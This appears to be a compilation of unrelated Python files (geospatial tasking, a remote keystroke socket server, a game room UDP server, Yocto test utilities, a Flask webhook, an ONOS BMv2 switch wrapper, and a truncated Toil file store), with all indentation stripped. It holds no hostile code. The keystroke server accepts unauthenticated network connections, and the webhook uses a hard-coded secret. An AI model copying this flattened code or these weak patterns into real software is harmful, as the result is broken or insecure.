worker = threading.Thread(target=split_groups, args=(q,))
worker.start()
q.join()
logger.info("split all groups.")
logger.debug("there are %s split groups" % len(split_groups_list))
# add the split groups to the final groups dict
for group_data in split_groups_list:
new_group_id = highest_group_id + 1
highest_group_id += 1
final_groups_dict[new_group_id] = group_data
logger.info("created %s groups." % len(final_groups_dict))
return final_groups_dict
def dissolve_project_data(project_data):
"""
This functions uses the unionCascaded function to return a dissolved MultiPolygon geometry
from several Single Part Polygon geometries.
"""
multipolygon_geometry = ogr.Geometry(ogr.wkbMultiPolygon)
for item in project_data:
polygon = ogr.CreateGeometryFromWkt(item["wkt"])
multipolygon_geometry.AddGeometry(polygon)
dissolved_geometry = multipolygon_geometry.UnionCascaded()
return dissolved_geometry
def generate_tasking_manager_geometries(project_id: str):
"""
This functions runs the workflow to create a GeoJSON file ready to be used in the HOT Tasking Manager.
First, data is loaded from the aggregated results csv file.
Then it filers results for which a defined threshold of yes and maybe classifications has been reached.
We then derive the Tasking Manager geometries, and a dissolved geometry of all filtered results.
Finally, both data sets are saved into GeoJSON files.
"""
raw_data_filename = f"{DATA_PATH}/api/agg_results/agg_results_{project_id}.csv"
filtered_data_filename = (
f"{DATA_PATH}/api/yes_maybe/yes_maybe_{project_id}.geojson"
)
tasking_manager_data_filename = (
f"{DATA_PATH}/api/hot_tm/hot_tm_{project_id}.geojson"
)
# load project data from existing files
results = load_data(project_id, raw_data_filename)
# filter yes and maybe results
filtered_results = filter_data(results)
if len(filtered_results) > 0:
# dissolve filtered results
dissolved_filtered_results = dissolve_project_data(filtered_results)
# create tasking manager geometries
tasking_manager_results = create_hot_tm_tasks(project_id, filtered_results)
# save data as geojson
geojson_functions.create_geojson_file(
dissolved_filtered_results, filtered_data_filename
)
geojson_functions.create_geojson_file_from_dict(
tasking_manager_results, tasking_manager_data_filename
)
|
server.py
|
import socket, threading
import keyboard
users = 0
def user(conn, n):
global users
myid = users
print("New user: " + str(myid))
users += 1
while True:
data = conn.recv(128)
if not data:
break
s = data.decode().split(';') # UP/DOWN;keycode
print(s[0] + ' by ' + s[1])
if s[0] == 'DOWN':
keyboard.press(s[1])
if s[0] == 'UP':
keyboard.release(s[1])
print("User disconnect: " + str(myid))
users -= 1
myaddr = socket.gethostbyname_ex(socket.gethostname())[-1]
print(str(myaddr))
sock = socket.socket()
sock.bind(('', 9090))
sock.listen(10)
while True:
conn, addr = sock.accept()
threading.Thread(target=user, args=(conn, 0)).start()
|
udp_main.py
|
import socketserver
import threading
import os
import random
import time
# import binascii
from . import aes
from .udp_parser import CommandParser
from .udp_class import Room, Player, bi
from .udp_config import Config
# token: {'key': key, 'room': Room, 'player_index': player_index, 'player_id': player_id}
link_play_data = {}
room_id_dict = {} # 'room_id': Room
room_code_dict = {} # 'room_code': Room
player_dict = {} # 'player_id' : Player
clean_timer = 0
def random_room_code():
# 随机生成房间号
re = ''
for _ in range(4):
re += chr(random.randint(65, 90))
for _ in range(2):
re += str(random.randint(0, 9))
return re
def clear_player(token):
# 清除玩家信息和token
del player_dict[link_play_data[token]['player_id']]
del link_play_data[token]
def clear_room(room):
# 清除房间信息
room_id = room.room_id
room_code = room.room_code
del room_id_dict[room_id]
del room_code_dict[room_code]
del room
def memory_clean(now):
# 内存清理
clean_room_list = []
clean_player_list = []
for token in link_play_data:
room = link_play_data[token]['room']
if now - room.timestamp >= Config.TIME_LIMIT:
clean_room_list.append(room.room_id)
if now - room.players[link_play_data[token]['player_index']].last_timestamp // 1000 >= Config.TIME_LIMIT:
clean_player_list.append(token)
for room_id in room_id_dict:
if now - room_id_dict[room_id].timestamp >= Config.TIME_LIMIT:
clean_room_list.append(room_id)
for room_id in clean_room_list:
if room_id in room_id_dict:
clear_room(room_id_dict[room_id])
for token in clean_player_list:
clear_player(token)
class UDPhandler(socketserver.BaseRequestHandler):
def handle(self):
client_msg, server = self.request
token = client_msg[:8]
iv = client_msg[8:20]
tag = client_msg[20:32]
ciphertext = client_msg[32:]
if int.from_bytes(token, byteorder='little') in link_play_data:
user = link_play_data[bi(token)]
else:
return None
plaintext = aes.decrypt(user['key'], b'', iv, ciphertext, tag)
# print(binascii.b2a_hex(plaintext))
commands = CommandParser(
user['room'], user['player_index']).get_commands(plaintext)
if user['room'].players[user['player_index']].player_id == 0:
clear_player(bi(token))
temp = []
for i in commands:
if i[:3] == b'\x06\x16\x12':
temp.append(i)
commands = temp
# 处理不能正确被踢的问题
for i in commands:
iv, ciphertext, tag = aes.encrypt(user['key'], i, b'')
# print(binascii.b2a_hex(i))
server.sendto(token + iv + tag[:12] +
ciphertext, self.client_address)
def server_run(ip, port):
server = socketserver.ThreadingUDPServer((ip, port), UDPhandler)
server.serve_forever()
def data_swap(conn):
clean_timer = 0
while True:
try:
data = conn.recv()
except EOFError:
break
now = round(time.time() * 1000)
if now - clean_timer >= Config.TIME_LIMIT:
clean_timer = now
memory_clean(now)
if data[0] == 1:
# 开房
key = os.urandom(16)
room_id = bi(os.urandom(8))
while room_id in room_id_dict and room_id == 0:
room_id = bi(os.urandom(8))
room = Room()
room.room_id = room_id
room_id_dict[room_id] = room
player_id = bi(os.urandom(3))
while player_id in player_dict and player_id == 0:
player_id = bi(os.urandom(3))
player = Player()
player.player_id = player_id
player.set_player_name(data[1])
player_dict[player_id] = player
player.song_unlock = data[2]
room.song_unlock = data[2]
room.host_id = player_id
room.players[0] = player
room.player_num = 1
room_code = random_room_code()
while room_code in room_code_dict:
room_code = random_room_code()
room.room_code = room_code
room_code_dict[room_code] = room
token = room_id
player.token = token
link_play_data[token] = {'key': key,
'room': room,
'player_index': 0,
'player_id': player_id}
conn.send((0, room_code, room_id, token, key, player_id))
elif data[0] == 2:
room_code = data[3].upper()
if room_code not in room_code_dict:
# 房间号错误
conn.send((1202, ))
else:
room = room_code_dict[room_code]
if room.player_num == 4:
# 满人
conn.send((1201, ))
elif room.state != 2:
# 无法加入
conn.send((1205, ))
else:
key = os.urandom(16)
token = bi(os.urandom(8))
player_id = bi(os.urandom(3))
while player_id in player_dict and player_id == 0:
player_id = bi(os.urandom(3))
player = Player()
player.player_id = player_id
player.set_player_name(data[1])
player.token = token
player_dict[player_id] = player
player.song_unlock = data[2]
room.update_song_unlock()
for i in range(4):
if room.players[i].player_id == 0:
room.players[i] = player
player_index = i
break
link_play_data[token] = {'key': key,
'room': room,
'player_index': player_index,
'player_id': player_id}
conn.send((0, room_code, room.room_id,
token, key, player_id, room.song_unlock))
elif data[0] == 3:
token = data[1]
if token in link_play_data:
r = link_play_data[token]
conn.send((0, r['room'].room_code, r['room'].room_id, r['key'],
r['room'].players[r['player_index']].player_id, r['room'].song_unlock))
else:
conn.send((108, ))
def link_play(conn, ip: str, port: int):
try:
server = threading.Thread(target=server_run, args=(ip, port))
data_exchange = threading.Thread(target=data_swap, args=(conn,))
server.start()
data_exchange.start()
except:
pass
|
commands.py
|
# Copyright (c) 2013-2014 Intel Corporation
#
# Released under the MIT license (see COPYING.MIT)
# DESCRIPTION
# This module is mainly used by scripts/oe-selftest and modules under meta/oeqa/selftest
# It provides a class and methods for running commands on the host in a convienent way for tests.
import os
import sys
import signal
import subprocess
import threading
import logging
from oeqa.utils import CommandError
from oeqa.utils import ftools
import re
import contextlib
# Export test doesn't require bb
try:
import bb
except ImportError:
pass
class Command(object):
def __init__(self, command, bg=False, timeout=None, data=None, **options):
self.defaultopts = {
"stdout": subprocess.PIPE,
"stderr": subprocess.STDOUT,
"stdin": None,
"shell": False,
"bufsize": -1,
}
self.cmd = command
self.bg = bg
self.timeout = timeout
self.data = data
self.options = dict(self.defaultopts)
if isinstance(self.cmd, basestring):
self.options["shell"] = True
if self.data:
self.options['stdin'] = subprocess.PIPE
self.options.update(options)
self.status = None
self.output = None
self.error = None
self.thread = None
self.log = logging.getLogger("utils.commands")
def run(self):
self.process = subprocess.Popen(self.cmd, **self.options)
def commThread():
self.output, self.error = self.process.communicate(self.data)
self.thread = threading.Thread(target=commThread)
self.thread.start()
self.log.debug("Running command '%s'" % self.cmd)
if not self.bg:
self.thread.join(self.timeout)
self.stop()
def stop(self):
if self.thread.isAlive():
self.process.terminate()
# let's give it more time to terminate gracefully before killing it
self.thread.join(5)
if self.thread.isAlive():
self.process.kill()
self.thread.join()
self.output = self.output.rstrip()
self.status = self.process.poll()
self.log.debug("Command '%s' returned %d as exit code." % (self.cmd, self.status))
# logging the complete output is insane
# bitbake -e output is really big
# and makes the log file useless
if self.status:
lout = "\n".join(self.output.splitlines()[-20:])
self.log.debug("Last 20 lines:\n%s" % lout)
class Result(object):
pass
def runCmd(command, ignore_status=False, timeout=None, assert_error=True, **options):
result = Result()
cmd = Command(command, timeout=timeout, **options)
cmd.run()
result.command = command
result.status = cmd.status
result.output = cmd.output
result.pid = cmd.process.pid
if result.status and not ignore_status:
if assert_error:
raise AssertionError("Command '%s' returned non-zero exit status %d:\n%s" % (command, result.status, result.output))
else:
raise CommandError(result.status, command, result.output)
return result
def bitbake(command, ignore_status=False, timeout=None, postconfig=None, **options):
if postconfig:
postconfig_file = os.path.join(os.environ.get('BUILDDIR'), 'oeqa-post.conf')
ftools.write_file(postconfig_file, postconfig)
extra_args = "-R %s" % postconfig_file
else:
extra_args = ""
if isinstance(command, basestring):
cmd = "bitbake " + extra_args + " " + command
else:
cmd = [ "bitbake" ] + [a for a in (command + extra_args.split(" ")) if a not in [""]]
try:
return runCmd(cmd, ignore_status, timeout, **options)
finally:
if postconfig:
os.remove(postconfig_file)
def get_bb_env(target=None, postconfig=None):
if target:
return bitbake("-e %s" % target, postconfig=postconfig).output
else:
return bitbake("-e", postconfig=postconfig).output
def get_bb_var(var, target=None, postconfig=None):
val = None
bbenv = get_bb_env(target, postconfig=postconfig)
lastline = None
for line in bbenv.splitlines():
if re.search("^(export )?%s=" % var, line):
val = line.split('=', 1)[1]
val = val.strip('\"')
break
elif re.match("unset %s$" % var, line):
# Handle [unexport] variables
if lastline.startswith('# "'):
val = lastline.split('\"')[1]
break
lastline = line
return val
def get_test_layer():
layers = get_bb_var("BBLAYERS").split()
testlayer = None
for l in layers:
if '~' in l:
l = os.path.expanduser(l)
if "/meta-selftest" in l and os.path.isdir(l):
testlayer = l
break
return testlayer
def create_temp_layer(templayerdir, templayername, priority=999, recipepathspec='recipes-*/*'):
os.makedirs(os.path.join(templayerdir, 'conf'))
with open(os.path.join(templayerdir, 'conf', 'layer.conf'), 'w') as f:
f.write('BBPATH .= ":${LAYERDIR}"\n')
f.write('BBFILES += "${LAYERDIR}/%s/*.bb \\' % recipepathspec)
f.write(' ${LAYERDIR}/%s/*.bbappend"\n' % recipepathspec)
f.write('BBFILE_COLLECTIONS += "%s"\n' % templayername)
f.write('BBFILE_PATTERN_%s = "^${LAYERDIR}/"\n' % templayername)
f.write('BBFILE_PRIORITY_%s = "%d"\n' % (templayername, priority))
f.write('BBFILE_PATTERN_IGNORE_EMPTY_%s = "1"\n' % templayername)
@contextlib.contextmanager
def runqemu(pn, ssh=True):
import bb.tinfoil
import bb.build
tinfoil = bb.tinfoil.Tinfoil()
tinfoil.prepare(False)
try:
tinfoil.logger.setLevel(logging.WARNING)
import oeqa.targetcontrol
tinfoil.config_data.setVar("TEST_LOG_DIR", "${WORKDIR}/testimage")
tinfoil.config_data.setVar("TEST_QEMUBOOT_TIMEOUT", "1000")
import oe.recipeutils
recipefile = oe.recipeutils.pn_to_recipe(tinfoil.cooker, pn)
recipedata = oe.recipeutils.parse_recipe(recipefile, [], tinfoil.config_data)
# The QemuRunner log is saved out, but we need to ensure it is at the right
# log level (and then ensure that since it's a child of the BitBake logger,
# we disable propagation so we don't then see the log events on the console)
logger = logging.getLogger('BitBake.QemuRunner')
logger.setLevel(logging.DEBUG)
logger.propagate = False
logdir = recipedata.getVar("TEST_LOG_DIR", True)
qemu = oeqa.targetcontrol.QemuTarget(recipedata)
finally:
# We need to shut down tinfoil early here in case we actually want
# to run tinfoil-using utilities with the running QEMU instance.
# Luckily QemuTarget doesn't need it after the constructor.
tinfoil.shutdown()
# Setup bitbake logger as console handler is removed by tinfoil.shutdown
bblogger = logging.getLogger('BitBake')
bblogger.setLevel(logging.INFO)
console = logging.StreamHandler(sys.stdout)
bbformat = bb.msg.BBLogFormatter("%(levelname)s: %(message)s")
if sys.stdout.isatty():
bbformat.enable_color()
console.setFormatter(bbformat)
bblogger.addHandler(console)
try:
qemu.deploy()
try:
qemu.start(ssh=ssh)
except bb.build.FuncFailed:
raise Exception('Failed to start QEMU - see the logs in %s' % logdir)
yield qemu
finally:
try:
qemu.stop()
except:
pass
|
app.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @author : microfat
# @time : 09/27/20 14:03:09
# @File : app.py
import hashlib
import threading
import json
from pygments import highlight, lexers, formatters
from flask import Flask, request
app = Flask(__name__)
class Handle:
def __init__(self):
pass
def handle(self, payload):
if payload['op'] == 'data_create':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_update':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_remove':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_recover':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'form_update':
colorful_json = self._colorful_json(payload)
print(colorful_json)
if payload['op'] == 'data_test':
print('data_test')
def _colorful_json(self, payload):
formatted_json = json.dumps(payload, indent=4, ensure_ascii=False, sort_keys=True)
colorful_json = highlight(formatted_json, lexers.JsonLexer(), formatters.TerminalFormatter())
return colorful_json
def get_signature(self, nonce, payload, secret, timestamp):
content = ':'.join([nonce, payload, secret, timestamp]).encode('utf-8')
m = hashlib.sha1()
m.update(content)
#print(content, m.hexdigest())
return m.hexdigest()
@app.route('/', methods=['POST'])
def callback():
handle = Handle()
payload = request.data.decode('utf-8')
#print(payload)
nonce = request.args['nonce']
timestamp = request.args['timestamp']
print('\n' + '\x1b[94m' + str(request.headers) + '\x1b[39;49;00m', end='')
if request.headers['x-jdy-signature'] != handle.get_signature(nonce, payload, 'test', timestamp):
return 'fail', 401
threading.Thread(target=handle.handle, args=(json.loads(payload), )).start()
return 'success'
|
bmv2.py
|
# coding=utf-8
"""
Copyright 2019-present Open Networking Foundation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import multiprocessing
import os
import random
import re
import socket
import sys
import threading
import time
import urllib2
from contextlib import closing
from mininet.log import info, warn, debug
from mininet.node import Switch, Host
SIMPLE_SWITCH_GRPC = 'simple_switch_grpc'
PKT_BYTES_TO_DUMP = 80
VALGRIND_PREFIX = 'valgrind --leak-check=yes'
SWITCH_START_TIMEOUT = 10 # seconds
BMV2_LOG_LINES = 5
BMV2_DEFAULT_DEVICE_ID = 1
DEFAULT_PIPECONF = "org.onosproject.pipelines.basic"
# Stratum paths relative to stratum repo root
STRATUM_BMV2 = 'stratum_bmv2'
STRATUM_BINARY = '/bazel-bin/stratum/hal/bin/bmv2/' + STRATUM_BMV2
STRATUM_INIT_PIPELINE = '/stratum/hal/bin/bmv2/dummy.json'
def getStratumRoot():
if 'STRATUM_ROOT' not in os.environ:
raise Exception("Env variable STRATUM_ROOT not set")
return os.environ['STRATUM_ROOT']
def parseBoolean(value):
if value in ['1', 1, 'true', 'True']:
return True
else:
return False
def pickUnusedPort():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
def writeToFile(path, value):
with open(path, "w") as f:
f.write(str(value))
def watchDog(sw):
try:
writeToFile(sw.keepaliveFile,
"Remove this file to terminate %s" % sw.name)
while True:
if ONOSBmv2Switch.mininet_exception == 1 \
or not os.path.isfile(sw.keepaliveFile):
sw.killBmv2(log=False)
return
if sw.stopped:
return
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
port = sw.grpcPortInternal if sw.grpcPortInternal else sw.grpcPort
if s.connect_ex(('localhost', port)) == 0:
time.sleep(1)
else:
warn("\n*** WARN: switch %s died ☠️ \n" % sw.name)
sw.printBmv2Log()
print ("-" * 80) + "\n"
return
except Exception as e:
warn("*** ERROR: " + e.message)
sw.killBmv2(log=True)
class ONOSHost(Host):
def __init__(self, name, inNamespace=True, **params):
Host.__init__(self, name, inNamespace=inNamespace, **params)
def config(self, **params):
r = super(Host, self).config(**params)
for off in ["rx", "tx", "sg"]:
cmd = "/sbin/ethtool --offload %s %s off" \
% (self.defaultIntf(), off)
self.cmd(cmd)
# disable IPv6
self.cmd("sysctl -w net.ipv6.conf.all.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.default.disable_ipv6=1")
self.cmd("sysctl -w net.ipv6.conf.lo.disable_ipv6=1")
return r
class ONOSBmv2Switch(Switch):
"""BMv2 software switch with gRPC server"""
# Shared value used to notify to all instances of this class that a Mininet
# exception occurred. Mininet exception handling doesn't call the stop()
# method, so the mn process would hang after clean-up since Bmv2 would still
# be running.
mininet_exception = multiprocessing.Value('i', 0)
def __init__(self, name, json=None, debugger=False, loglevel="warn",
elogger=False, grpcport=None, cpuport=255, notifications=False,
thriftport=None, netcfg=True, dryrun=False,
pipeconf=DEFAULT_PIPECONF, pktdump=False, valgrind=False,
gnmi=False, portcfg=True, onosdevid=None, stratum=False,
**kwargs):
Switch.__init__(self, name, **kwargs)
self.grpcPort = grpcport
self.grpcPortInternal = None # Needed for Stratum (local_hercules_url)
self.thriftPort = thriftport
self.cpuPort = cpuport
self.json = json
self.useStratum = parseBoolean(stratum)
self.debugger = parseBoolean(debugger)
self.notifications = parseBoolean(notifications)
self.loglevel = loglevel
# Important: Mininet removes all /tmp/*.log files in case of exceptions.
# We want to be able to see the bmv2 log if anything goes wrong, hence
# avoid the .log extension.
self.logfile = '/tmp/bmv2-%s-log' % self.name
self.elogger = parseBoolean(elogger)
self.pktdump = parseBoolean(pktdump)
self.netcfg = parseBoolean(netcfg)
self.dryrun = parseBoolean(dryrun)
self.valgrind = parseBoolean(valgrind)
self.netcfgfile = '/tmp/bmv2-%s-netcfg.json' % self.name
self.chassisConfigFile = '/tmp/bmv2-%s-chassis-config.txt' % self.name
self.pipeconfId = pipeconf
self.injectPorts = parseBoolean(portcfg)
self.withGnmi = parseBoolean(gnmi)
self.longitude = kwargs['longitude'] if 'longitude' in kwargs else None
self.latitude = kwargs['latitude'] if 'latitude' in kwargs else None
if onosdevid is not None and len(onosdevid) > 0:
self.onosDeviceId = onosdevid
else:
self.onosDeviceId = "device:bmv2:%s" % self.name
self.p4DeviceId = BMV2_DEFAULT_DEVICE_ID
self.logfd = None
self.bmv2popen = None
self.stopped = True
# In case of exceptions, mininet removes *.out files from /tmp. We use
# this as a signal to terminate the switch instance (if active).
self.keepaliveFile = '/tmp/bmv2-%s-watchdog.out' % self.name
self.targetName = STRATUM_BMV2 if self.useStratum else SIMPLE_SWITCH_GRPC
# Remove files from previous executions
self.cleanupTmpFiles()
def getSourceIp(self, dstIP):
"""
Queries the Linux routing table to get the source IP that can talk with
dstIP, and vice versa.
"""
ipRouteOut = self.cmd('ip route get %s' % dstIP)
r = re.search(r"src (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})", ipRouteOut)
return r.group(1) if r else None
def getDeviceConfig(self, srcIP):
basicCfg = {
"managementAddress": "grpc://%s:%d?device_id=%d" % (
srcIP, self.grpcPort, self.p4DeviceId),
"driver": "stratum-bmv2" if self.useStratum else "bmv2",
"pipeconf": self.pipeconfId
}
if self.longitude and self.latitude:
basicCfg["longitude"] = self.longitude
basicCfg["latitude"] = self.latitude
cfgData = {
"basic": basicCfg
}
if not self.useStratum and self.injectPorts:
portData = {}
portId = 1
for intfName in self.intfNames():
if intfName == 'lo':
continue
portData[str(portId)] = {
"number": portId,
"name": intfName,
"enabled": True,
"removed": False,
"type": "copper",
"speed": 10000
}
portId += 1
cfgData['ports'] = portData
return cfgData
def chassisConfig(self):
config = """description: "BMv2 simple_switch {name}"
chassis {{
platform: PLT_P4_SOFT_SWITCH
name: "{name}"
}}
nodes {{
id: {nodeId}
name: "{name} node {nodeId}"
slot: 1
index: 1
}}\n""".format(name=self.name, nodeId=self.p4DeviceId)
intfNumber = 1
for intfName in self.intfNames():
if intfName == 'lo':
continue
config = config + """singleton_ports {{
id: {intfNumber}
name: "{intfName}"
slot: 1
port: {intfNumber}
channel: 1
speed_bps: 10000000000
config_params {{
admin_state: ADMIN_STATE_ENABLED
}}
node: {nodeId}
}}\n""".format(intfName=intfName, intfNumber=intfNumber,
nodeId=self.p4DeviceId)
intfNumber += 1
return config
def doOnosNetcfg(self, controllerIP):
"""
Notifies ONOS about the new device via Netcfg.
"""
srcIP = self.getSourceIp(controllerIP)
if not srcIP:
warn("*** WARN: unable to get switch IP address, won't do netcfg\n")
return
cfgData = {
"devices": {
self.onosDeviceId: self.getDeviceConfig(srcIP)
}
}
with open(self.netcfgfile, 'w') as fp:
json.dump(cfgData, fp, indent=4)
if not self.netcfg:
# Do not push config to ONOS.
print ""
return
# Build netcfg URL
url = 'http://%s:8181/onos/v1/network/configuration/' % controllerIP
# Instantiate password manager for HTTP auth
pm = urllib2.HTTPPasswordMgrWithDefaultRealm()
pm.add_password(None, url,
os.environ['ONOS_WEB_USER'],
os.environ['ONOS_WEB_PASS'])
urllib2.install_opener(urllib2.build_opener(
urllib2.HTTPBasicAuthHandler(pm)))
# Push config data to controller
req = urllib2.Request(url, json.dumps(cfgData),
{'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
print f.read()
f.close()
except urllib2.URLError as e:
warn("*** WARN: unable to push config to ONOS (%s)\n" % e.reason)
def start(self, controllers):
if not self.stopped:
warn("*** %s is already running!\n" % self.name)
return
# Remove files from previous executions (if we are restarting)
self.cleanupTmpFiles()
if self.grpcPort is None:
self.grpcPort = pickUnusedPort()
writeToFile("/tmp/bmv2-%s-grpc-port" % self.name, self.grpcPort)
if self.thriftPort is None:
self.thriftPort = pickUnusedPort()
writeToFile("/tmp/bmv2-%s-thrift-port" % self.name, self.thriftPort)
if self.useStratum:
config_dir = "/tmp/bmv2-%s-stratum" % self.name
os.mkdir(config_dir)
with open(self.chassisConfigFile, 'w') as fp:
fp.write(self.chassisConfig())
if self.grpcPortInternal is None:
self.grpcPortInternal = pickUnusedPort()
cmdString = self.getStratumCmdString(config_dir)
else:
cmdString = self.getBmv2CmdString()
if self.dryrun:
info("\n*** DRY RUN (not executing %s)\n" % self.targetName)
debug("\n%s\n" % cmdString)
try:
if not self.dryrun:
# Start the switch
self.stopped = False
self.logfd = open(self.logfile, "w")
self.logfd.write(cmdString + "\n\n" + "-" * 80 + "\n\n")
self.logfd.flush()
self.bmv2popen = self.popen(cmdString,
stdout=self.logfd,
stderr=self.logfd)
self.waitBmv2Start()
# We want to be notified if BMv2/Stratum dies...
threading.Thread(target=watchDog, args=[self]).start()
self.doOnosNetcfg(self.controllerIp(controllers))
except Exception:
ONOSBmv2Switch.mininet_exception = 1
self.killBmv2()
self.printBmv2Log()
raise
def getBmv2CmdString(self):
bmv2Args = [SIMPLE_SWITCH_GRPC] + self.bmv2Args()
if self.valgrind:
bmv2Args = VALGRIND_PREFIX.split() + bmv2Args
return " ".join(bmv2Args)
def getStratumCmdString(self, config_dir):
stratumRoot = getStratumRoot()
args = [
stratumRoot + STRATUM_BINARY,
'-device_id=%d' % self.p4DeviceId,
'-chassis_config_file=%s' % self.chassisConfigFile,
'-forwarding_pipeline_configs_file=/dev/null',
'-persistent_config_dir=' + config_dir,
'-initial_pipeline=' + stratumRoot + STRATUM_INIT_PIPELINE,
'-cpu_port=%s' % self.cpuPort,
'-external_hercules_urls=0.0.0.0:%d' % self.grpcPort,
'-local_hercules_url=localhost:%d' % self.grpcPortInternal,
'-bmv2_thrift_port=%d' % self.thriftPort,
'-bmv2_log_level=%s' % self.loglevel,
'-max_num_controllers_per_node=10',
'-write_req_log_file=/dev/null'
]
return " ".join(args)
def bmv2Args(self):
args = ['--device-id %s' % str(self.p4DeviceId)]
for port, intf in self.intfs.items():
if not intf.IP():
args.append('-i %d@%s' % (port, intf.name))
args.append('--thrift-port %s' % self.thriftPort)
if self.notifications:
ntfaddr = 'ipc:///tmp/bmv2-%s-notifications.ipc' % self.name
args.append('--notifications-addr %s' % ntfaddr)
if self.elogger:
nanologaddr = 'ipc:///tmp/bmv2-%s-nanolog.ipc' % self.name
args.append('--nanolog %s' % nanologaddr)
if self.debugger:
dbgaddr = 'ipc:///tmp/bmv2-%s-debug.ipc' % self.name
args.append('--debugger-addr %s' % dbgaddr)
args.append('--log-console')
if self.pktdump:
args.append('--pcap --dump-packet-data %s' % PKT_BYTES_TO_DUMP)
args.append('-L%s' % self.loglevel)
if not self.json:
args.append('--no-p4')
else:
args.append(self.json)
# gRPC target-specific options
args.append('--')
args.append('--cpu-port %s' % self.cpuPort)
args.append('--grpc-server-addr 0.0.0.0:%s' % self.grpcPort)
return args
def waitBmv2Start(self):
# Wait for switch to open gRPC port, before sending ONOS the netcfg.
# Include time-out just in case something hangs.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
endtime = time.time() + SWITCH_START_TIMEOUT
while True:
port = self.grpcPortInternal if self.grpcPortInternal else self.grpcPort
result = sock.connect_ex(('localhost', port))
if result == 0:
# No new line
sys.stdout.write("⚡️ %s @ %d" % (self.targetName, self.bmv2popen.pid))
sys.stdout.flush()
# The port is open. Let's go! (Close socket first)
sock.close()
break
# Port is not open yet. If there is time, we wait a bit.
if endtime > time.time():
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(0.05)
else:
# Time's up.
raise Exception("Switch did not start before timeout")
def printBmv2Log(self):
if os.path.isfile(self.logfile):
print "-" * 80
print "%s log (from %s):" % (self.name, self.logfile)
with open(self.logfile, 'r') as f:
lines = f.readlines()
if len(lines) > BMV2_LOG_LINES:
print "..."
for line in lines[-BMV2_LOG_LINES:]:
print line.rstrip()
@staticmethod
def controllerIp(controllers):
try:
# onos.py
clist = controllers[0].nodes()
except AttributeError:
clist = controllers
assert len(clist) > 0
return random.choice(clist).IP()
def killBmv2(self, log=False):
self.stopped = True
if self.bmv2popen is not None:
self.bmv2popen.terminate()
self.bmv2popen.wait()
self.bmv2popen = None
if self.logfd is not None:
if log:
self.logfd.write("*** PROCESS TERMINATED BY MININET ***\n")
self.logfd.close()
self.logfd = None
def cleanupTmpFiles(self):
self.cmd("rm -rf /tmp/bmv2-%s-*" % self.name)
def stop(self, deleteIntfs=True):
"""Terminate switch."""
self.killBmv2(log=True)
Switch.stop(self, deleteIntfs)
class ONOSStratumSwitch(ONOSBmv2Switch):
def __init__(self, name, **kwargs):
kwargs["stratum"] = True
super(ONOSStratumSwitch, self).__init__(name, **kwargs)
# Exports for bin/mn
switches = {
'onosbmv2': ONOSBmv2Switch,
'stratum': ONOSStratumSwitch,
}
hosts = {'onoshost': ONOSHost}
|
fileStore.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import map
from builtins import str
from builtins import range
from builtins import object
from abc import abstractmethod, ABCMeta
from toil.lib.objects import abstractclassmethod
import base64
from collections import namedtuple, defaultdict
import dill
import errno
import logging
import os
import shutil
import stat
import tempfile
import time
import uuid
from contextlib import contextmanager
from fcntl import flock, LOCK_EX, LOCK_UN
from functools import partial
from hashlib import sha1
from threading import Thread, Semaphore, Event
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six.moves import xrange
from toil.lib.humanize import bytes2human
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.resource import ModuleDescriptor
from future.utils import with_metaclass
logger = logging.getLogger(__name__)
class DeferredFunction(namedtuple('DeferredFunction', 'function args kwargs name module')):
"""
>>> df = DeferredFunction.create(defaultdict, None, {'x':1}, y=2)
>>> df
DeferredFunction(defaultdict, ...)
>>> df.invoke() == defaultdict(None, x=1, y=2)
True
"""
@classmethod
def create(cls, function, *args, **kwargs):
"""
Capture the given callable and arguments as an instance of this class.
:param callable function: The deferred action to take in the form of a function
:param tuple args: Non-keyword arguments to the function
:param dict kwargs: Keyword arguments to the function
"""
# The general principle is to deserialize as late as possible, i.e. when the function is
# to be invoked, as that will avoid redundantly deserializing deferred functions for
# concurrently running jobs when the cache state is loaded from disk. By implication we
# should serialize as early as possible. We need to serialize the function as well as its
# arguments.
return cls(*list(map(dill.dumps, (function, args, kwargs))),
name=function.__name__,
module=ModuleDescriptor.forModule(function.__module__).globalize())
def invoke(self):
"""
Invoke the captured function with the captured arguments.
"""
logger.debug('Running deferred function %s.', self)
self.module.makeLoadable()
function, args, kwargs = list(map(dill.loads, (self.function, self.args, self.kwargs)))
return function(*args, **kwargs)
def __str__(self):
return '%s(%s, ...)' % (self.__class__.__name__, self.name)
__repr__ = __str__
class FileStore(with_metaclass(ABCMeta, object)):
"""
An abstract base class to represent the interface between a worker and the job store. Concrete
subclasses will be used to manage temporary files, read and write files from the job store and
log messages, passed as argument to the :meth:`toil.job.Job.run` method.
"""
# Variables used for syncing reads/writes
